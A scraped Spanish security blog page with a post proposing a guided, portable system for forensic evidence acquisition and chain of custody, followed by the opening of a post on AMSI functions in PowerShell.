Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Además, en la actualidad, no sólo los delitos tipificados como cibercrímenes tienen una componente tecnológica en la que es necesario hacer alguna investigación sobre algún medio digital como un móvil, un portátil o un servidor.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por otro lado, el número de hechos esclarecidos es muy inferior al de los conocidos y su tendencia de crecimiento no se acerca a la de los primeros:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_zanNIWcI1KRGREeH8PrEN5kzr5YXyTXNcg87z3tiHi-beV9kIm-HFErD9i0NPAHK-N7dyUo4Mdtpl3OeaA1-Fu8wF_QfwE8fTaSTBO9QFqGmXCplF7P6S9-iAX_s6mkX6buycXj6oks8tZ6EGq4nvlK_7oy5k44bOw3CPPDOkk8pHanmy6JHM-i9_Dd0/s3028/Picture2.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="Gráfico comparativo entre delitos conocidos y delitos esclarecidos" border="0" data-original-height="1346" data-original-width="3028" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_zanNIWcI1KRGREeH8PrEN5kzr5YXyTXNcg87z3tiHi-beV9kIm-HFErD9i0NPAHK-N7dyUo4Mdtpl3OeaA1-Fu8wF_QfwE8fTaSTBO9QFqGmXCplF7P6S9-iAX_s6mkX6buycXj6oks8tZ6EGq4nvlK_7oy5k44bOw3CPPDOkk8pHanmy6JHM-i9_Dd0/w640-h284/Picture2.png" title="Gráfico comparativo entre delitos conocidos y delitos esclarecidos" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por lo tanto, el número de casos en los que es necesaria la ayuda de un análisis informático forense dentro de un proceso judicial es cada vez mayor.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Pero en realidad no es necesaria la existencia de un litigio para que sea conveniente realizar un estudio forense de una infraestructura informática. Muchas empresas, a nivel interno, emplean metodologías de análisis forense para resolver, prevenir, reducir y controlar la ocurrencia del fraude dentro de la organización. A menudo se toman muestras o evidencias para su uso futuro en posibles procesos de control interno o judiciales.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Casi todas las metodologías de análisis forense resumen su operativa en las muy conocidas cinco fases que nos permitimos recordar:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">1º <b>Adquisición</b>. Donde se realiza una copia de la información susceptible de poder ser presentada como prueba en un proceso. Estas evidencias deben ser recogidas sin alterar los originales, utilizando dispositivos o procedimiento de sólo lectura que garanticen que no se sobrescribe el medio de almacenamiento de origen. Se debe respetar la volatilidad de las muestras y priorizar su recogida. Y se deben etiquetar y almacenar todos los dispositivos originales de forma segura.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">2º <b>Preservación</b>. En esta fase se garantiza la perdurabilidad en el tiempo y la cadena de custodia de la información recogida.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">3º <b>Análisis.</b> Se emplean técnicas que, junto con la experiencia y la inteligencia del analista, ayudarán a resolver el qué, el cómo y el quién del caso analizado.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">4º<b> Documentación.</b> Fase en la que se asegura que todo el proceso (información y procedimientos aplicados) queda correctamente documentado y fechado.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">5º <b>Presentación.</b> Donde se generan al menos un informe ejecutivo y otro técnico recogiendo las conclusiones de todo el análisis.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Los jueces tienen muy en cuenta cómo son recogidas y almacenadas las evidencias digitales, dependiendo su validez de los métodos elegidos. Por lo tanto, es evidente que las fases de adquisición y preservación son fundamentales para todo el proceso. Si en estas fases se comete algún error, toda investigación, junto con todos los análisis posteriores, dejará de ser válidos.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Cuál es el problema?</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En <a href="https://www.enisa.europa.eu/publications/electronic-evidence-a-basic-guide-for-first-responders/at_download/fullReport">Electronic evidence - A basic guide for First Responders - ENISA</a> se proponen los siguientes principios que deben asegurarse en la gestión de evidencias digitales:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Integridad de los datos.</b> No se debe modificar ningún dato que deba usarse en la resolución de un caso por un juzgado. La persona encargada de la escena del crimen o de la recolección es la responsable de que eso no ocurra. Además, si el dispositivo recogido está encendido, la adquisición debe hacerse de forma que se modifique lo mínimo posible.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Registro.</b> Se debe crear y actualizar un registro con todas las acciones realizadas sobre las evidencias recogidas, desde su adquisición hasta cualquier consulta posterior.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Soporte de especialistas.</b> En cualquier momento durante la adquisición debe ser posible la intervención de un especialista debidamente formado en técnicas forenses digitales. Dicho especialista debe tener el suficiente conocimiento técnico y legal, así como la experiencia y autorización necesarias.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"><b>Formación.</b> Cualquier persona que maneje evidencias digitales debe tener una formación básica técnica y legal.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"><b> Legalidad. </b>Se debe asegurar la legalidad correspondiente a lo largo de todo el proceso.</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Siempre con estos principios en mente, en la fase de adquisición hay que tomar decisiones y responder preguntas complicadas como:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> ¿Dónde se encuentra físicamente la información?</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> Qué dispositivos de almacenamiento copiar.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> ¿Se debe apagar un dispositivo para realizar la adquisición?</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> Orden para realizar las copias, teniendo en cuenta la volatilidad de los datos implicados.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> ¿Es necesario buscar y copiar dispositivos ocultos, no visibles o remotos?</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> ¿Se han empleado técnicas anti forenses para ocultar información?</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> Necesidad de soporte de un especialista forense.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"> Necesidad de un fedatario.</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En la escena del crimen pueden concurrir varios perfiles de profesionales con diferentes niveles de responsabilidad, formación y experiencia. No todos ellos pueden contestar exitosamente las preguntas anteriores.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Claramente, el número de profesionales debidamente cualificados para realizar estas adquisiciones forenses no es suficiente. Otros factores que complican la situación son las restricciones de movimiento, el teletrabajo, la necesidad de operar en entornos hostiles o los límites presupuestarios.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En este escenario, sería de gran ayuda un sistema autónomo y portable, que pudiera ser operado por una persona sin entrenamiento específico, que asistiera en la adquisición, almacenamiento y documentado seguros de evidencias digitales.</span></div> <div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Qué tenemos?</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Existen en el mercado múltiples herramientas específicas para la adquisición de evidencias. Algunas son comerciales y otras de uso libre. A continuación, os dejamos una lista con algunas de las más representativas y utilizadas comparando sus principales características:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwmmOJJFUgYzNr9XQfdyJ4sC1OS9bScLVYglCF1qlZLoKlG-s6Sb3EVp55D_d3cAEKgAYINvYlJkoGU01CPybc_DS8Q8-B154_3MMvRUHyKbDOY0UC5JNPEH0tEt3ZfHTc5-vnV5avReAS-69OjWtEN-6tSBPcqQPhB66tjbIoLJJiy5F0S4w10pWB2KfS/s802/tabla.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="277" data-original-width="802" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwmmOJJFUgYzNr9XQfdyJ4sC1OS9bScLVYglCF1qlZLoKlG-s6Sb3EVp55D_d3cAEKgAYINvYlJkoGU01CPybc_DS8Q8-B154_3MMvRUHyKbDOY0UC5JNPEH0tEt3ZfHTc5-vnV5avReAS-69OjWtEN-6tSBPcqQPhB66tjbIoLJJiy5F0S4w10pWB2KfS/w640-h222/tabla.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Todas tienen en común que son complejas de utilizar, que necesitan formación específica para su uso y, sobre todo, que pueden ser peligrosas si no se utilizan correctamente, es fácil incurrir en una pérdida irrecuperable de datos.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por otro lado, existen multitud de distribuciones Linux con orientación a la informática forense que proporcionan herramientas específicas para la adquisición de evidencias. Entre todas, destacamos las siguientes por su grado de actualización y especialización en el proceso forense:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjol8EJrDbUXvxaFPULlCcgKsgTKjlnIPQipvvC7LzlWH_fh09W-FiRbnOKQpeswvuyXj7yVwvS6B0KsFnpaKXZCLBqHt8iVa2EU91AhJflAhbFJrGsLWbh0gBh2FNWA5kW4txRBhLsdGRgxtvGQPxfk8niP66QHCSXR9FS6Xo1iXV7DbIB6ivmP5omO1nW" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="" data-original-height="351" data-original-width="780" height="288" src="https://blogger.googleusercontent.com/img/a/AVvXsEjol8EJrDbUXvxaFPULlCcgKsgTKjlnIPQipvvC7LzlWH_fh09W-FiRbnOKQpeswvuyXj7yVwvS6B0KsFnpaKXZCLBqHt8iVa2EU91AhJflAhbFJrGsLWbh0gBh2FNWA5kW4txRBhLsdGRgxtvGQPxfk8niP66QHCSXR9FS6Xo1iXV7DbIB6ivmP5omO1nW=w640-h288" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Todos sabemos que existen otras distribuciones muy completas que cubren no sólo el proceso de análisis forense sino cualquier parcela relacionada con la ciberseguridad. Entre ellas cabe destacar <a href="https://www.kali.org/">Kali Linux</a>, <a href="https://blackarch.org/">BlackArch Linux</a>, <a href="http://www.matriux.com/">Matriux</a>, <a href="https://www.backbox.org/">BackBox Linux</a> o <a href="https://www.parrotsec.org/">Parrot</a>.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Todas ellas disponen de las mejores herramientas para el análisis forense y con todas es posible realizar una adquisición de evidencias digitales segura. Todas tienen indudable valor para el profesional de la ciberseguridad. Pero en el contexto de este análisis, todas tienen algunos inconvenientes:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> Pueden ser complejas de poner en marcha si no se tienen los conocimientos suficientes.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> Necesitan formación técnica específica para utilizar sus herramientas forenses.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> No están diseñadas específicamente para la adquisición de evidencias digitales.</span></li></ul></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br />¿Qué proponemos?</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Un sistema que permita eliminar todas estas deficiencias, ofreciendo una solución específica para la adquisición de evidencias digitales, que permita a un operador sin demasiados conocimientos recoger, de forma segura y en cualquier lugar, datos e información que podría ser utilizada en un proceso judicial.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A continuación, nos permitimos imaginar una lista de características deseables durante las fases de adquisición, preservación y documentación y no encontradas juntas en ninguna de las distribuciones anteriores:</span></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> Sistema integrado portátil, dedicado y autocontenido.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> Interfaz de usuario intuitiva, sencilla y simple de utilizar, que no requiera casi aprendizaje.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"> Interfaz de usuario que evite o minimice errores por desconocimiento o malintencionados.</span></li></ul></div><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;">Guiado de actividades para usuarios sin experiencia a través de un sistema experto que implemente la inteligencia y experiencia de un analista forense.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"> Ayuda en la identificación de evidencias. A menudo poco o nada visibles.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"> Adquisición segura (en integridad y disponibilidad) de dispositivos de almacenamiento.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Uso de la técnica correcta según el tipo de evidencia.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"> Asistencia en el almacenado físico y etiquetado de las adquisiciones.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Configuración de la cadena de custodia de evidencias digitales.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"> Generación del registro de actividades.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"> Generación de documentación.</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Además, podríamos imaginar que integrara funciones de utilidad en las fases de análisis y presentación del proceso forense, pudiendo así cubrir todo el proceso forense. Incluso añadir inteligencia específica para el análisis de nuevos casos de fraude, industria e IoT, infraestructuras críticas, etc.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Imaginemos un caso de uso genérico:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiy2Nm6-bESFtBhCq_f_GwtiKa6jnQfiw8vegRFkOv8SJ7ahDFRG7mDSpNsUZYjcRkdpDL79G-k1oiWkGpPNdYxLYU17UCCWwYPbFbE_QY6mQA3Jx0My1N7Wc1ZCvUO1kB1CJ9ZYrscbFiMIAbWUyrszttqGJCoyhOwwQFiqWvavcw21X5sx4p4yDrGsetf" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="Esquema sobre cómo funcionan las diferentes fases del análisis y proceso de análisis forense en ciberseguridad" data-original-height="522" data-original-width="1212" height="276" src="https://blogger.googleusercontent.com/img/a/AVvXsEiy2Nm6-bESFtBhCq_f_GwtiKa6jnQfiw8vegRFkOv8SJ7ahDFRG7mDSpNsUZYjcRkdpDL79G-k1oiWkGpPNdYxLYU17UCCWwYPbFbE_QY6mQA3Jx0My1N7Wc1ZCvUO1kB1CJ9ZYrscbFiMIAbWUyrszttqGJCoyhOwwQFiqWvavcw21X5sx4p4yDrGsetf=w640-h276" title="Descripción proceso de análisis forense digital" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">O el flujo general de nuestro sistema:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgx1YjctXoYKpGA6fH42DZBl7try4OJhcmBloU-i--wDqKY3YAn_ZTn52CpySuUfOvCHZHUyjK4HXsUDDNyIunZriRzfhxr772Z_DQboZN0DvAK8m-ouXJYwMF_WaW5I_nESLWoO1OBqVjYs01pAje3FenHmEyY1NzW9a-9xKhjV0zgbqK1NzlG2xqXfvVU" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="" data-original-height="696" data-original-width="562" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEgx1YjctXoYKpGA6fH42DZBl7try4OJhcmBloU-i--wDqKY3YAn_ZTn52CpySuUfOvCHZHUyjK4HXsUDDNyIunZriRzfhxr772Z_DQboZN0DvAK8m-ouXJYwMF_WaW5I_nESLWoO1OBqVjYs01pAje3FenHmEyY1NzW9a-9xKhjV0zgbqK1NzlG2xqXfvVU=w517-h640" width="517" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Imaginemos el modelo de datos necesario:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhwFRSEhy1Wl39cvh-EJdf0oxPBFqnm4PfFE2rFEYE5XW5i2u1z6LH8rVLz1mxd7wTTMr8Um4qJaykdEyYMWAONBoAh8Zh94bK2kNaKltQgO-2Uu6HtWvDPvxqfxv3_tHa6kwJglCVyx_ClEGrySbNkLkTdUcnCkHzjAKxsXNq9hMy1V637X3BShxZHf1t5" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="" data-original-height="1189" data-original-width="1354" height="563" src="https://blogger.googleusercontent.com/img/a/AVvXsEhwFRSEhy1Wl39cvh-EJdf0oxPBFqnm4PfFE2rFEYE5XW5i2u1z6LH8rVLz1mxd7wTTMr8Um4qJaykdEyYMWAONBoAh8Zh94bK2kNaKltQgO-2Uu6HtWvDPvxqfxv3_tHa6kwJglCVyx_ClEGrySbNkLkTdUcnCkHzjAKxsXNq9hMy1V637X3BShxZHf1t5=w640-h563" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">O incluso cómo podría ser su interfaz:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg2lTSXbdJci6TI9R9pxVCB8yr1fb5U20i_YecN-Jm_JXV3rlXRBaWxsUpx5L32U37KpOnWSKFmD9hljSLH2SHs3jChY68ooT4Kmq0ko6ze0RX8Wt5hKG3Pq5wrfZLrOmDArCz7p4ZMMK2tCkEUByMFe1UHouGAlyBeGZWkFFyFrsBkBaZh5VefJ0Sm-pDy" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="" data-original-height="419" data-original-width="905" height="296" src="https://blogger.googleusercontent.com/img/a/AVvXsEg2lTSXbdJci6TI9R9pxVCB8yr1fb5U20i_YecN-Jm_JXV3rlXRBaWxsUpx5L32U37KpOnWSKFmD9hljSLH2SHs3jChY68ooT4Kmq0ko6ze0RX8Wt5hKG3Pq5wrfZLrOmDArCz7p4ZMMK2tCkEUByMFe1UHouGAlyBeGZWkFFyFrsBkBaZh5VefJ0Sm-pDy=w640-h296" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhVTgxBjeaXj7iyIUsvsMCf6KWhR2sJZASUTleORna-EI325qnj_v9wEzlWbd1qvuGd8Jlimxs5-vloXm1IfLlmFnIWlKIr_XIINTXIBD5PyNo5kOa4AYzSRz0vO-oxCg7c1O99ImohvZPdZQtlrse28KyUo4JAHOu5Zr7z1JWVJ0YGOidZf8vkktgBejeo" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="" data-original-height="350" data-original-width="440" height="509" src="https://blogger.googleusercontent.com/img/a/AVvXsEhVTgxBjeaXj7iyIUsvsMCf6KWhR2sJZASUTleORna-EI325qnj_v9wEzlWbd1qvuGd8Jlimxs5-vloXm1IfLlmFnIWlKIr_XIINTXIBD5PyNo5kOa4AYzSRz0vO-oxCg7c1O99ImohvZPdZQtlrse28KyUo4JAHOu5Zr7z1JWVJ0YGOidZf8vkktgBejeo=w640-h509" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /><br /></span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Concluyendo</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Existen todas las herramientas de diseño, implementación e integración de sistemas necesarias para desarrollar un sistema como el que ahora hemos imaginado. Es posible desarrollar un sistema experto que ayude a personal sin formación específica en informática forense a realizar una adquisición guiada y segura de las evidencias necesarias para resolver un incidente de seguridad.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Es posible integrar técnicas, procedimientos y herramientas específicas con un sistema experto que implementa la inteligencia de un analista forense en un software que puede ser utilizado por usuarios con pocos conocimientos en un entorno que requiere metodología, integridad y documentación muy exhaustivos.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Equipos de respuesta inmediata como cuerpos y fuerzas de seguridad, peritos forenses junior y profesionales de la informática y las comunicaciones podrían ser sus principales usuarios. Los principios de seguridad e integridad bajo los que estaría desarrollado permitirían su uso en investigaciones y procedimientos judiciales o en auditorías internas dentro de organizaciones privadas o públicas.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esperamos que este artículo haya servido de inspiración para muchos. Imaginar y soñar es gratis y algunos incluso llegan a hacerlo realidad. Si eres de esos <a href="https://www.zerolynx.com/es/empleo-ciberseguridad/">acompáñanos</a>.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/paniaguaivan/">Iván Paniagua Barrilero</a>,<i> Teachnical Lead at <a href="https://www.zerolynx.com/es/">Zerolynx.</a></i></span></div> <div class="separator" style="clear: both; text-align: right;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><br />Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-40354705568949547062023-10-09T08:30:00.013+02:002023-11-07T13:12:11.903+01:00Funciones de AMSI<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRsaYbLQq9UfPLBkSPRjPtGrkXNGPx2NqdgKMxlk-NkjzucLHRUN22B2NvCQyKYDi8nza8WmRmHVQKWyPfz130GeqD5Lom6_zQPMvJRXIYZWceTJJ6SzIcF5sJrItes_3t-5RpfsJvD87KHZArSqiTPRsLQ5RAPwRwsiwVpB_PJztUlweHjgTDfeaHZZCw/s4924/Zerolynx_FluProject_AMSI.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3282" data-original-width="4924" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRsaYbLQq9UfPLBkSPRjPtGrkXNGPx2NqdgKMxlk-NkjzucLHRUN22B2NvCQyKYDi8nza8WmRmHVQKWyPfz130GeqD5Lom6_zQPMvJRXIYZWceTJJ6SzIcF5sJrItes_3t-5RpfsJvD87KHZArSqiTPRsLQ5RAPwRwsiwVpB_PJztUlweHjgTDfeaHZZCw/w640-h426/Zerolynx_FluProject_AMSI.png" width="640" /></a></div><p style="text-align: left;"></p><p style="text-align: justify;"><span style="font-family: arial;"><br /></span></p><div style="text-align: justify;"><span style="font-family: arial;">¡</span><span style="font-family: Barlow Semi Condensed;">Muy buenas a todos! Hace unas cuantas publicaciones, hablamos sobre la <a href="https://www.flu-project.com/2023/09/IntroduccionAMSI.html">introducción a AMSI</a>. Hoy vamos a continuar adentrándonos en
el mundo de AMSI. En esta ocasión, vamos a profundizar en las funciones que
utiliza intérpretes como PowerShell para comunicarse con las medidas de
seguridad gracias a la API AMSI.</span></div><p class="MsoNormal" style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><o:p></o:p></span></p>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Dado que AMSI forma parte de la Windows API (user-mode),
está documentada por Microsoft para que los desarrolladores no tengan problema
en usarla. Es decir, las librerías de la Windows API tienen documentación
acerca de cómo se estructuran sus funciones, que parámetros espera cada
función, valores que recibe, etc. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En primer lugar, tenemos la función AmsiInitialize. Esta
función se llama antes de que ejecutemos cualquier comando en la PowerShell, es
decir, esta función se llama en el momento en el que se ejecuta el intérprete.
Por lo tanto, es una función complicada para atacar y hacer un bypass, debido a
que no se puede modificar la lógica mediante comandos PowerShell.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
